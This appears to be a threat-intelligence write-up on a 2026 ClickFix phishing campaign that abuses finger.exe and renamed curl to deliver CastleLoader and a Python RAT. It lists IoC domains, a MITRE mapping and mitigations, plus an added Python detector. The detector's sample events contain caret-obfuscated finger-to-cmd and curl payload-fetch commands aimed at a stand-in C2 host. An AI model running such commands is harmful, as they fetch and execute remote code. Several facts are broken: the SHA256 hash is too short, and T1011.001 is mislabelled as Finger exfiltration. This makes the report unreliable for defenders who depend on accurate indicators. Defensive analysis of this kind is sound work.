Full Report
The LevelBlue OpsIntel CTI team examined the latest version of the ClickFix campaign, which emerged in early May 2026. The campaign employs a multi-stage phishing delivery chain that impersonates trusted employment and professional networking platforms, such as LinkedIn and Indeed, to lure victims. This variant leverages the legacy Finger protocol through native Windows command-line utilities as part of its delivery process. The threat actors use legitimate Windows tools and portable Python runtimes to execute in-memory shellcode, ultimately deploying a fileless Malware-as-a-Service (MaaS) framework tracked as CastleLoader and a Python-based remote access trojan (RAT). The campaign reflects the continued rise of browser-based social engineering with Living-off-the-Land binaries (LOLBin) and Python-based payload delivery.
Analysis Summary
# Tool/Technique: ClickFix (2026 Finger Protocol Variant)
## Overview
The ClickFix campaign is a sophisticated social engineering and delivery framework that uses browser-based lures to trick users into executing malicious commands. This specific 2026 variant impersonates professional platforms like LinkedIn and Indeed, utilizing a "fake CAPTCHA" lure to facilitate a multi-stage infection chain that ultimately deploys the CastleLoader framework and a Python-based Remote Access Trojan (RAT).
## Technical Details
- **Type**: Malware-as-a-Service (MaaS) / Delivery Technique
- **Platform**: Windows
- **Capabilities**: Browser social engineering, LOLBin abuse, fileless execution, in-memory shellcode loading, and persistent remote access.
- **First Seen**: May 2026
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
  - [T1059.003 - Command and Scripting Interpreter: Windows Command Shell]
  - [T1204.002 - User Execution: Malicious Link]
- **[TA0005 - Defense Evasion]**
  - [T1218 - System Binary Proxy Execution]
  - [T1027.002 - Obfuscation: Software Packing]
  - [T1140 - Deobfuscate/Decode Files or Information]
  - [T1564.003 - Hide Artifacts: Hidden Window]
- **[TA0011 - Command and Control]**
  - [T1105 - Ingress Tool Transfer]
  - [T1011.001 - Exfiltration Over Alternative Protocol: Finger]
## Functionality
### Core Capabilities
- **Social Engineering**: Uses fake Cloudflare Turnstile/CAPTCHA pages to trick users into copying a malicious command to their clipboard and pasting it into a terminal.
- **LOLBin Abuse**: Leverages `finger.exe` (a legacy protocol utility) to fetch remote command streams and `curl.exe` (renamed to avoid detection) for payload retrieval.
- **System Disruption**: Kills and restarts `explorer.exe` to hide the taskbar and desktop icons, disorienting the user and limiting navigation during the infection.
- **Python-In-Memory**: Deploys portable Python runtimes (CPython or IronPython) to execute complex scripts and shellcode without requiring a pre-installed Python environment.
### Advanced Features
- **Finger Protocol Steganography**: Uses the legacy Finger protocol via `finger.exe` to bypass network filters that typically ignore or don't inspect this outdated traffic.
- **Fileless Execution**: Stages the **CastleLoader** framework, which operates primarily in memory to avoid disk-based forensic detection.
- **ROT13 Encoding**: Uses simple encoding for first-stage JavaScript payloads to evade basic signature-based web gateways.
## Indicators of Compromise
- **File Hashes (SHA256)**:
  - `aea8348e8902cac80eb0df31b43a71601a62e2514087fef40a416bfd` (Python RAT bytecode - play.pyc)
- **File Names**:
  - `%LocalAppData%\d{18}.com` (Renamed curl.exe)
  - `%LocalAppData%\d{18}.exe` (Renamed curl.exe)
- **Network Indicators**:
  - `uslinked[.]org` (C2/Payload Delivery)
  - `kevinnotanother[.]com` (C2 Domain)
  - `staruxaproruha[.]com` (C2 Domain)
  - `novayastaruxa[.]com` (C2 Domain)
  - `crewlcrewlcrewl[.]com` (C2 Domain)
  - `crewlworkinew[.]com` (C2 Domain)
- **Behavioral Indicators**:
  - Unexpected termination and restart of `explorer.exe`.
  - Outbound traffic from `finger.exe` to external domains.
  - Execution of `cmd.exe` or `powershell.exe` containing `Set-Clipboard` or `f^i^n^g^e^r` (caret-obfuscated).
## Associated Threat Actors
- Tracked as part of the broader **ClickFix** ecosystem (MaaS).
## Detection Methods
- **Behavioral Detection**: Monitor for `finger.exe` initiating network connections, as this protocol is rarely used in modern corporate environments.
- **Process Monitoring**: Alert on `cmd.exe` processes spawned with minimized windows (`/min`) and caret-based obfuscation.
- **Endpoint Detection**: Watch for the creation of portable Python runtime directories in `%LocalAppData%` by non-standard processes.
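The behavioral indicators and detection methods above, turned into detection logic run over constructed process-create and network-connect events. This is an added example, not code from the LevelBlue report; the Sysmon-like field names, file paths, host `1.2.3.4` and domain `c2.example` are assumptions made for the sample data.

```python
import ipaddress
import re

# Constructed sample telemetry in a Sysmon-like shape (id 1 = process create,
# id 3 = network connect). Field names, paths and the host 1.2.3.4 / c2.example
# are assumptions made for this example, not values from real logs.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /min /c "f^i^n^g^e^r jobs@c2.example | cmd"'},
    {"id": 3, "image": r"C:\Windows\System32\finger.exe", "dst": "1.2.3.4", "dport": 79},
    {"id": 1, "image": r"C:\Users\u\AppData\Local\123456789012345678.com",
     "cmdline": "123456789012345678.com -s https://c2.example/p -o p.zip"},
    {"id": 3, "image": r"C:\Windows\System32\finger.exe", "dst": "10.0.0.5", "dport": 79},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

# %LocalAppData%\<18 digits>.com or .exe, the renamed-curl naming from the IoC list.
RENAMED_CURL = re.compile(r"\\appdata\\local\\\d{18}\.(com|exe)$")

def normalize(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (f^i^n^g^e^r -> finger), collapse whitespace,
    case-fold. Carets inside double quotes are literal to cmd, but stripping
    them all is the conservative choice for a detector: it can only add matches."""
    return re.sub(r"\s+", " ", cmdline.replace("^", "")).lower()

def detect(ev: dict) -> list[str]:
    """Return the behavioural indicators from the report that one event matches."""
    findings = []
    image = ev["image"].lower()
    if ev["id"] == 3 and image.endswith("\\finger.exe"):
        # finger.exe reaching a routable address is the key network signal; internal and loopback destinations are skipped to cut noise.
        if ipaddress.ip_address(ev["dst"]).is_global:
            findings.append("finger.exe outbound connection to external host")
    if ev["id"] == 1:
        raw = ev["cmdline"]
        norm = normalize(raw)
        obfuscated = "^" in raw
        if image.endswith("\\cmd.exe") and "/min" in norm and obfuscated:
            findings.append("cmd.exe minimized window with caret obfuscation")
        if "finger" in norm and obfuscated:
            findings.append("caret-obfuscated finger invocation")
        if "set-clipboard" in norm:
            findings.append("Set-Clipboard in command line")
        if RENAMED_CURL.search(image):
            findings.append("18-digit .com/.exe in %LocalAppData% (renamed curl pattern)")
    return findings

def scan(events: list[dict]) -> list[tuple[int, str]]:
    return [(i, f) for i, ev in enumerate(events) for f in detect(ev)]
```

Feed `scan()` a batch of real endpoint events in the same shape to get (event index, finding) pairs; the caret-stripping in `normalize()` is what keeps `f^i^n^g^e^r` from slipping past a plain substring match.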
## Mitigation Strategies
- **Network Hardening**: Block the Finger protocol (TCP port 79) at the network perimeter.
- **User Training**: Educate staff on "Copy-Paste" phishing lures; emphasize that legitimate CAPTCHAs do not require manual command execution.
- **Attack Surface Reduction**: Use AppLocker or Windows Defender Application Control (WDAC) to restrict the execution of LOLBins like `finger.exe` to authorized users only.
## Related Tools/Techniques
- **CastleLoader**: The fileless loader framework deployed in the final stage.
- **EtherHiding**: A related technique used in previous ClickFix campaigns to hide malicious code in blockchain logs.